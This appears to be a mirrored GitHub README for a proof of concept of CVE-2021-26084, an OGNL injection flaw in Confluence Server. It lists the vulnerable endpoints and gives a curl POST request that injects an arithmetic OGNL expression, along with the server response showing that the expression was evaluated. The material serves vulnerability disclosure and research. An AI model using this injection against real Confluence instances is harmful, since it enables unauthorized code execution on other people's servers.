Code Monkey home page Code Monkey logo

cve-2021-26084_poc's Introduction

CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injection

An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.

poc

My fight to locate the entrypoints and injections XD

Fight (1) Fight (2)
2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium 2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium

Finally confluence Entrypoints Exploited

https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

My first manual inspection: Note: Pre-Authenticated user

# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

Server Response: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />

References:

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

Amazing writeup posted here:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Some hints very useful by:
@wvuuuuuuuuuuuuu
@iamnoooob

Author

Alex Hernandez aka (@_alt3kx_)

cve-2021-26084_poc's People

Contributors

alt3kx avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar

Forkers

kkin77 test502git whisper-r sleepyeinstein jtryan 007divyachawla hij139 ykankaya themehdi githubsectest netcode pulbicpoc securityanalysts afwu crackercat xiuyr4 amesianx

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.